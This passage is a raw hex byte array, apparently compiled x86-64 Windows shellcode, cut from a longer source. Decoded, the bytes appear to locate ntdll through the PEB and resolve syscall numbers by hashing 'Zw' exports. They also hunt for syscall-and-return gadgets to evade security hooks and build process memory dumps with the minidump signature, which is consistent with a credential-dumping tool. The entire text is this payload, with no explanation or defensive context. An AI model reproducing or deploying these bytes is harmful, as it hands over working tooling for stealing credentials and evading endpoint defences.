,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x48,0x8B,0x45,0x18,0x66,0x89,0x10,0x48,0x8B,0x45,0x20,0x66,0xC7,0x00,0x00,0x00,0xE8,0x50,0x5D,0x00,0x00,0xC1,0xE0,0x08,0x25,0x00,0xFF,0x00,0x00,0x89,0xC2,0x48,0x8B,0x45,0x20,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x48,0x8B,0x45,0x20,0x66,0x89,0x10,0xE8,0x2B,0x5D,0x00,0x00,0x0F,0xB6,0xD0,0x48,0x8B,0x45,0x20,0x0F,0xB7,0x00,0x89,0xC1,0x89,0xD0,0x09,0xC8,0x89,0xC2,0x48,0x8B,0x45,0x20,0x66,0x89,0x10,0x48,0x8B,0x45,0x10,0x8B,0x00,0x3D,0x4D,0x44,0x4D,0x50,0x0F,0x84,0x00,0xFF,0xFF,0xFF,0x48,0x8B,0x45,0x18,0x0F,0xB7,0x00,0x66,0x3D,0x93,0xA7,0x0F,0x84,0xEF,0xFE,0xFF,0xFF,0x48,0x8B,0x45,0x20,0x0F,0xB7,0x00,0x66,0x85,0xC0,0x0F,0x84,0xDF,0xFE,0xFF,0xFF,0x90,0x90,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x8B,0x45,0x10,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x9A,0x13,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x90,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0xC7,0x45,0xE8,0x00,0x02,0x00,0x00,0x8B,0x45,0xE8,0x89,0x45,0xFC,0x8B,0x45,0xE8,0x89,0x45,0xFC,0x8B,0x45,0xE8,0x89,0xC3,0x48,0x8B,0x05,0xEA,0xED,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xDE,0xED,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xA5,0x00,0x00,0x00,0x44,0x8B,0x45,0xE8,0x48,0x8B,0x4D,0xF0,0x48,0x8B,0x45,0x20,0x48,0x8D,0x55,0xE8,0x48,0x89,0x54,0x24,0x20,0x45,0x89,0xC1,0x49,0x89,0xC8,0xBA,0x1B,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x1E,0x0F,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x78,0x1B,0x48,0x8B,0x45,0x28,0x48,0x8B,0x55,0xF0,0x48,0x89,0x10,0x8B,0x55,0xE8,0x48,0x8B,0x45,0x30,0x89,0x10,0xB8,0x01,0x00,0x00,0x00,0xEB,0x59,0x48,0x83,0x7D,0xF0,0x00,0x74,0x40,0x8B,0x55,0xFC,0x48,0x8B,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xB5,0x5B,0x00,0x00,0x48,0x8B,0x05,0x4E,0xED,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x46,0xED,0x00,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x81,0x7D,0xEC,0x04,0x00,0x00,0xC0,0x0F,0x84,0x23,0xFF,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x58,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x48,0x89,0x4D,0x10,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xC0,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x30,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x5A,0x0E,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xE0,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0x48,0x89,0x4D,0x10,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xC0,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x30,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x70,0x1D,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xD8,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x10,0x48,0x89,0x4D,0x10,0xC7,0x45,0xFC,0x60,0x00,0x00,0x00,0x8B,0x45,0xFC,0x65,0x48,0x8B,0x00,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x48,0x83,0xC4,0x10,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x60,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0xBD,0xFF,0xFF,0xFF,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xB1,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x83,0xC0,0x18,0x48,0x89,0x45,0xF0,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xD8,0x48,0x8B,0x55,0xF0,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x08,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x3D,0x0C,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x79,0x0D,0x83,0x7D,0x18,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x61,0x83,0x7D,0xEC,0x00,0x79,0x0D,0x83,0x7D,0x18,0x00,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x4E,0x48,0x8B,0x45,0xD8,0x48,0x83,0xC0,0x10,0x48,0x89,0x45,0xE0,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0x8D,0x4D,0xD0,0x48,0x8B,0x55,0xE0,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x08,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xDA,0x0B,0x00,0x00,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xD0,0x48,0x83,0xC4,0x60,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x48,0x8B,0x05,0x2A,0xEB,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x20,0x02,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x1B,0xEB,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF8,0x48,0x83,0x7D,0xF8,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xAC,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x18,0x48,0x8B,0x40,0x30,0x48,0x89,0xC2,0x48,0x8B,0x45,0xF8,0x48,0x89,0x50,0x08,0x48,0x8B,0x45,0x18,0x8B,0x50,0x40,0x48,0x8B,0x45,0xF8,0x89,0x50,0x10,0x48,0x8B,0x45,0x18,0x8B,0x90,0x80,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x89,0x90,0x18,0x02,0x00,0x00,0x48,0x8B,0x45,0x18,0x8B,0x90,0x20,0x01,0x00,0x00,0x48,0x8B,0x45,0xF8,0x89,0x90,0x1C,0x02,0x00,0x00,0x48,0x8B,0x45,0x18,0x0F,0xB7,0x40,0x48,0xBA,0x00,0x02,0x00,0x00,0x66,0x39,0xD0,0x0F,0x47,0xC2,0x0F,0xB7,0xC0,0x89,0x45,0xF4,0x8B,0x4D,0xF4,0x48,0x8B,0x45,0xF8,0x4C,0x8D,0x40,0x14,0x48,0x8B,0x45,0x18,0x48,0x8B,0x50,0x50,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x49,0x89,0xC9,0x48,0x89,0xC1,0xE8,0xE3,0x0A,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x04,0x48,0x8B,0x45,0xF8,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x4C,0x89,0x4D,0x28,0x48,0x8B,0x4D,0x20,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x28,0x01,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x8B,0x0A,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x5F,0x48,0x8B,0x45,0x28,0x41,0xB8,0x04,0x01,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x45,0x58,0x00,0x00,0x48,0x8B,0x45,0x20,0x0F,0xB7,0x40,0x58,0x44,0x0F,0xB7,0xC0,0x48,0x8B,0x45,0x20,0x48,0x8B,0x50,0x60,0x48,0x8B,0x4D,0x28,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x4D,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x31,0x0A,0x00,0x00,0x89,0x45,0xFC,0x83,0x7D,0xFC,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x81,0xEC,0xA0,0x03,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0x30,0x03,0x00,0x00,0x48,0x89,0x95,0x38,0x03,0x00,0x00,0x44,0x89,0x85,0x40,0x03,0x00,0x00,0x44,0x89,0x8D,0x48,0x03,0x00,0x00,0x48,0xC7,0x85,0x18,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x8B,0x95,0x48,0x03,0x00,0x00,0x48,0x8B,0x85,0x30,0x03,0x00,0x00,0x48,0x89,0xC1,0xE8,0x23,0xFD,0xFF,0xFF,0x48,0x89,0x85,0x10,0x03,0x00,0x00,0x48,0x83,0xBD,0x10,0x03,0x00,0x00,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x09,0x02,0x00,0x00,0x48,0xC7,0x85,0x08,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x66,0xC7,0x85,0x06,0x03,0x00,0x00,0x00,0x00,0xC7,0x85,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xE9,0xB0,0x01,0x00,0x00,0x4C,0x8D,0x45,0xA0,0x48,0x8D,0x8D,0xB0,0x01,0x00,0x00,0x48,0x8B,0x95,0x10,0x03,0x00,0x00,0x48,0x8B,0x85,0x30,0x03,0x00,0x00,0x4D,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x9C,0xFE,0xFF,0xFF,0x89,0x85,0xEC,0x02,0x00,0x00,0x83,0xBD,0xEC,0x02,0x00,0x00,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xA6,0x01,0x00,0x00,0x48,0x83,0xBD,0x08,0x03,0x00,0x00,0x00,0x75,0x0E,0x48,0x8B,0x85,0xB8,0x01,0x00,0x00,0x48,0x89,0x85,0x08,0x03,0x00,0x00,0xC7,0x85,0xFC,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xE9,0x19,0x01,0x00,0x00,0x8B,0x85,0xFC,0x02,0x00,0x00,0x48,0x98,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0x38,0x03,0x00,0x00,0x48,0x01,0xD0,0x48,0x8B,0x00,0x48,0x8D,0x55,0xA0,0x48,0x89,0xC1,0x48,0x8B,0x05,0xFB,0xE8,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x0F,0x85,0xDD,0x00,0x00,0x00,0x8B,0x85,0xFC,0x02,0x00,0x00,0x48,0x98,0x48,0x8D,0x14,0xC5,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0x38,0x03,0x00,0x00,0x48,0x01,0xD0,0x48,0x8B,0x00,0x48,0x8D,0x15,0xBD,0x76,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xC3,0xE8,0x00,0x00,0xFF,0xD0,0x85,0xC0,0x75,0x0A,0xC7,0x85,0x00,0x03,0x00,0x00,0x01,0x00,0x00,0x00,0x48,0x8D,0x95,0xB0,0x01,0x00,0x00,0x48,0x8B,0x85,0x30,0x03,0x00,0x00,0x48,0x89,0xC1,0xE8,0xDC,0xFC,0xFF,0xFF,0x48,0x89,0x85,0xE0,0x02,0x00,0x00,0x48,0x83,0xBD,0xE0,0x02,0x00,0x00,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xDB,0x00,0x00,0x00,0x48,0x83,0xBD,0x18,0x03,0x00,0x00,0x00,0x75,0x10,0x48,0x8B,0x85,0xE0,0x02,0x00,0x00,0x48,0x89,0x85,0x18,0x03,0x00,0x00,0xEB,0x41,0x48,0x8B,0x85,0x18,0x03,0x00,0x00,0x48,0x89,0x85,0xF0,0x02,0x00,0x00,0xEB,0x11,0x48,0x8B,0x85,0xF0,0x02,0x00,0x00,0x48,0x8B,0x00,0x48,0x89,0x85,0xF0,0x02,0x00,0x00,0x48,0x8B,0x85,0xF0,0x02,0x00,0x00,0x48,0x8B,0x00,0x48,0x85,0xC0,0x75,0xE0,0x48,0x8B,0x85,0xF0,0x02,0x00,0x00,0x48,0x8B,0x95,0xE0,0x02,0x00,0x00,0x48,0x89,0x10,0x0F,0xB7,0x85,0x06,0x03,0x00,0x00,0x83,0xC0,0x01,0x66,0x89,0x85,0x06,0x03,0x00,0x00,0xEB,0x19,0x83,0x85,0xFC,0x02,0x00,0x00,0x01,0x8B,0x85,0xFC,0x02,0x00,0x00,0x3B,0x85,0x40,0x03,0x00,0x00,0x0F,0x8C,0xD5,0xFE,0xFF,0xFF,0x48,0x8B,0x85,0xB0,0x01,0x00,0x00,0x48,0x89,0x85,0x10,0x03,0x00,0x00,0x48,0x8B,0x85,0x10,0x03,0x00,0x00,0x48,0x3B,0x85,0x08,0x03,0x00,0x00,0x74,0x15,0x0F,0xBF,0x85,0x06,0x03,0x00,0x00,0x39,0x85,0x40,0x03,0x00,0x00,0x0F,0x8F,0x3D,0xFE,0xFF,0xFF,0xEB,0x01,0x90,0x83,0xBD,0x48,0x03,0x00,0x00,0x00,0x74,0x10,0x83,0xBD,0x00,0x03,0x00,0x00,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x07,0x48,0x8B,0x85,0x18,0x03,0x00,0x00,0x48,0x81,0xC4,0xA0,0x03,0x00,0x00,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xB8,0xAD,0xDE,0xDE,0xC0,0xC3,0x90,0x0F,0x0B,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0xB9,0x0F,0x2A,0x9B,0xCD,0xE8,0x3F,0x06,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x40,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x66,0xC7,0x45,0xE1,0x0F,0x05,0xC6,0x45,0xE3,0xC3,0x8B,0x45,0x18,0x83,0xE8,0x02,0x89,0x45,0xE4,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xEB,0x35,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x48,0x89,0x45,0xE8,0x48,0x8B,0x55,0xE8,0x48,0x8D,0x45,0xE1,0x41,0xB8,0x03,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE8,0x54,0x00,0x00,0x85,0xC0,0x75,0x09,0x48,0x8B,0x45,0xE8,0xE9,0xD1,0x00,0x00,0x00,0x83,0x45,0xFC,0x01,0x8B,0x45,0xFC,0x3B,0x45,0xE4,0x72,0xC3,0xC7,0x45,0xF8,0x01,0x00,0x00,0x00,0xE9,0xA5,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xEB,0x3E,0x8B,0x55,0xF4,0x48,0x8B,0x45,0x10,0x48,0x01,0xC2,0x8B,0x45,0xF8,0x0F,0xAF,0x45,0x18,0x89,0xC0,0x48,0x01,0xD0,0x48,0x89,0x45,0xE8,0x48,0x8B,0x55,0xE8,0x48,0x8D,0x45,0xE1,0x41,0xB8,0x03,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x8A,0x54,0x00,0x00,0x85,0xC0,0x75,0x06,0x48,0x8B,0x45,0xE8,0xEB,0x76,0x83,0x45,0xF4,0x01,0x8B,0x45,0xF4,0x3B,0x45,0xE4,0x72,0xBA,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xEB,0x41,0x8B,0x55,0xF0,0x48,0x8B,0x45,0x10,0x48,0x01,0xC2,0x8B,0x45,0xF8,0x0F,0xAF,0x45,0x18,0x89,0xC1,0x48,0x89,0xD0,0x48,0x29,0xC8,0x48,0x89,0x45,0xE8,0x48,0x8B,0x55,0xE8,0x48,0x8D,0x45,0xE1,0x41,0xB8,0x03,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x38,0x54,0x00,0x00,0x85,0xC0,0x75,0x06,0x48,0x8B,0x45,0xE8,0xEB,0x24,0x83,0x45,0xF0,0x01,0x8B,0x45,0xF0,0x3B,0x45,0xE4,0x72,0xB7,0x83,0x45,0xF8,0x01,0x81,0x7D,0xF8,0x25,0x02,0x00,0x00,0x0F,0x86,0x4E,0xFF,0xFF,0xFF,0x48,0x8D,0x05,0xAA,0xFE,0xFF,0xFF,0x48,0x83,0xC4,0x40,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x10,0x48,0x89,0x4D,0x10,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0xDE,0xC0,0x37,0x13,0xEB,0x28,0x8B,0x45,0xFC,0x8D,0x50,0x01,0x89,0x55,0xFC,0x89,0xC2,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x0F,0xB7,0x00,0x66,0x89,0x45,0xF6,0x0F,0xB7,0x45,0xF6,0x8B,0x55,0xF8,0xC1,0xCA,0x08,0x01,0xD0,0x31,0x45,0xF8,0x8B,0x55,0xFC,0x48,0x8B,0x45,0x10,0x48,0x01,0xD0,0x0F,0xB6,0x00,0x84,0xC0,0x75,0xC7,0x8B,0x45,0xF8,0x48,0x83,0xC4,0x10,0x5D,0xC3,0x55,0x53,0x48,0x81,0xEC,0xE8,0x00,0x00,0x00,0x48,0x8D,0xAC,0x24,0xE0,0x00,0x00,0x00,0x8B,0x05,0xBF,0xA3,0x00,0x00,0x85,0xC0,0x74,0x0A,0xB8,0x01,0x00,0x00,0x00,0xE9,0x15,0x04,0x00,0x00,0xC7,0x85,0x64,0xFF,0xFF,0xFF,0x60,0x00,0x00,0x00,0x8B,0x85,0x64,0xFF,0xFF,0xFF,0x65,0x48,0x8B,0x00,0x48,0x89,0x85,0x58,0xFF,0xFF,0xFF,0x48,0x8B,0x85,0x58,0xFF,0xFF,0xFF,0x48,0x89,0x45,0xD0,0x48,0x8B,0x45,0xD0,0x48,0x8B,0x40,0x18,0x48,0x89,0x45,0xC8,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xC8,0x48,0x8B,0x40,0x10,0x48,0x89,0x45,0xE8,0xE9,0xA1,0x00,0x00,0x00,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x40,0x30,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x48,0x89,0x45,0xC0,0x48,0x8B,0x45,0xC0,0x8B,0x40,0x3C,0x48,0x63,0xD0,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0xB8,0x48,0x8B,0x45,0xB8,0x48,0x05,0x88,0x00,0x00,0x00,0x48,0x89,0x45,0xB0,0x48,0x8B,0x45,0xB0,0x8B,0x00,0x89,0x45,0xAC,0x83,0x7D,0xAC,0x00,0x74,0x4C,0x8B,0x55,0xAC,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0xF8,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x0C,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0xA0,0x48,0x8B,0x45,0xA0,0x8B,0x00,0x0D,0x20,0x20,0x20,0x20,0x3D,0x6E,0x74,0x64,0x6C,0x75,0x1B,0x48,0x8B,0x45,0xA0,0x48,0x83,0xC0,0x04,0x8B,0x00,0x0D,0x20,0x20,0x20,0x20,0x3D,0x6C,0x2E,0x64,0x6C,0x74,0x24,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x00,0x48,0x89,0x45,0xE8,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x40,0x30,0x48,0x85,0xC0,0x0F,0x85,0x4E,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF8,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xFC,0x02,0x00,0x00,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x18,0x89,0x45,0xE4,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x1C,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0x98,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x20,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0x90,0x48,0x8B,0x45,0xF8,0x8B,0x40,0x24,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x45,0x88,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0x8D,0x05,0x4C,0xA2,0x00,0x00,0x48,0x89,0x45,0x80,0x8B,0x45,0xE4,0x83,0xE8,0x01,0x89,0xC0,0x48,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x90,0x48,0x01,0xD0,0x8B,0x00,0x89,0xC2,0x48,0x8B,0x45,0xF0,0x48,0x01,0xD0,0x48,0x89,0x85,0x78,0xFF,0xFF,0xFF,0x48,0x8B,0x85,0x78,0xFF,0xFF,0xFF,0x0F,0xB7,0x00,0x66,0x3D,0x5A,0x77,0x75,0x6E,0x8B,0x45,0xE0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x8D,0x1C,0x02,0x48,0x8B,0x85,0x78,0xFF,0xFF,0xFF,0x48,0x89,0xC1,0xE8,0xB2,0xFD,0xFF,0xFF,0x89,0x03,0x8B,0x45,0xE4,0x83,0xE8,0x01,0x89,0xC0,0x48,0x8D,0x14,0x00,0x48,0x8B,0x45,0x88,0x48,0x01,0xD0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x48,0x8D,0x14,0x85,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x98,0x48,0x01,0xD0,0x8B,0x55,0xE0,0x48,0x89,0xD1,0x48,0xC1,0xE1,0x04,0x48,0x8B,0x55,0x80,0x48,0x01,0xCA,0x8B,0x00,0x89,0x42,0x04,0x83,0x45,0xE0,0x01,0x81,0x7D,0xE0,0x26,0x02,0x00,0x00,0x74,0x10,0x83,0x6D,0xE4,0x01,0x83,0x7D,0xE4,0x00,0x0F,0x85,0x4B,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x8B,0x45,0xE0,0x89,0x05,0x7F,0xA1,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xE9,0x3C,0x01,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xE9,0x17,0x01,0x00,0x00,0x8B,0x45,0xDC,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xD0,0x8B,0x40,0x04,0x8B,0x55,0xDC,0x83,0xC2,0x01,0x89,0xD2,0x48,0x89,0xD1,0x48,0xC1,0xE1,0x04,0x48,0x8B,0x55,0x80,0x48,0x01,0xCA,0x8B,0x52,0x04,0x39,0xC2,0x0F,0x83,0xDE,0x00,0x00,0x00,0x48,0xC7,0x85,0x40,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x48,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x8B,0x45,0xDC,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xD0,0x8B,0x00,0x89,0x85,0x40,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xD0,0x8B,0x40,0x04,0x89,0x85,0x44,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x83,0xC0,0x01,0x89,0xC0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xD0,0x8B,0x55,0xDC,0x48,0x89,0xD1,0x48,0xC1,0xE1,0x04,0x48,0x8B,0x55,0x80,0x48,0x01,0xCA,0x8B,0x00,0x89,0x02,0x8B,0x45,0xDC,0x83,0xC0,0x01,0x89,0xC0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xD0,0x8B,0x55,0xDC,0x48,0x89,0xD1,0x48,0xC1,0xE1,0x04,0x48,0x8B,0x55,0x80,0x48,0x01,0xCA,0x8B,0x40,0x04,0x89,0x42,0x04,0x8B,0x45,0xDC,0x83,0xC0,0x01,0x89,0xC0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xC2,0x8B,0x85,0x40,0xFF,0xFF,0xFF,0x89,0x02,0x8B,0x45,0xDC,0x83,0xC0,0x01,0x89,0xC0,0x48,0xC1,0xE0,0x04,0x48,0x89,0xC2,0x48,0x8B,0x45,0x80,0x48,0x01,0xC2,0x8B,0x85,0x44,0xFF,0xFF,0xFF,0x89,0x42,0x04,0x83,0x45,0xDC,0x01,0x8B,0x05,0x4A,0xA0,0x00,0x00,0x2B,0x45,0xE0,0x83,0xE8,0x01,0x39,0x45,0xDC,0x0F,0x82,0xD4,0xFE,0xFF,0xFF,0x83,0x45,0xE0,0x01,0x8B,0x05,0x31,0xA0,0x00,0x00,0x83,0xE8,0x01,0x39,0x45,0xE0,0x0F,0x82,0xB2,0xFE,0xFF,0xFF,0x48,0x8B,0x45,0x80,0x48,0x83,0xC0,0x10,0x8B,0x50,0x04,0x48,0x8B,0x45,0x80,0x8B,0x40,0x04,0x